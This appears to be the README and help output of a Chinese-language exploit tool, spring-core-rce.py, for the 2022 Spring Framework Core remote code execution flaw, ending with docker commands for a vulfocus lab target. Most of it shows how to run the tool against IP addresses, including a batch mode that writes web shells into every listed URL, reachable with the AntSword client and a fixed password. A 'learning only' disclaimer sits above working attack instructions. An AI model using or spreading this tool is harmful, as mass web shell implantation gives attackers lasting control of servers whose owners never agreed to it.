影响范围:JDK>=9 的spring框架及衍生框架
脚本仅供学习使用,如作他用所承受的法律责任一概与作者无关
pip3 install -r requirements.txt$ python3 spring-core-rce.py -h
.----..-.-. .---. .-..-. .-..----. .----. .---. .---. .----. .---. .----..----.
{ {__-`| } }}} }}_}{ || \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} }| |-' | } \ | }| }\ {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-' `-'-' `-'`-' `-'`----' `----' `---' `-'-' `----' `-'-' `----'`----'
Spring framework Core RCE
By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]
Spring framework Core 0day RCE 帮助指南
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL 指定url
-s SYSTEM, --system SYSTEM
指定目标主机操作系统,默认linux,参数为win/linux
-r FILE, --file FILE 指定url文件,批量写马无损探测
-u,--url 或者使用-f,--file批量探测
-c,--check,参数为自建http服务,可用
python3 -m http.server 80快速搭建一个web服务器主要在内网且要求无损探测漏洞的情况下使用
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"
使用 -u指定url,-s指定操作系统 参数为:linux 或者 win,默认为linux
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"
使用 -r 批量写马 ,使用蚁剑连接,密码为k3rwin
python3 spring-core-rce.py -r "urls.txt"
docker pull vulfocus/spring-core-rce-2022-03-29:latest
docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29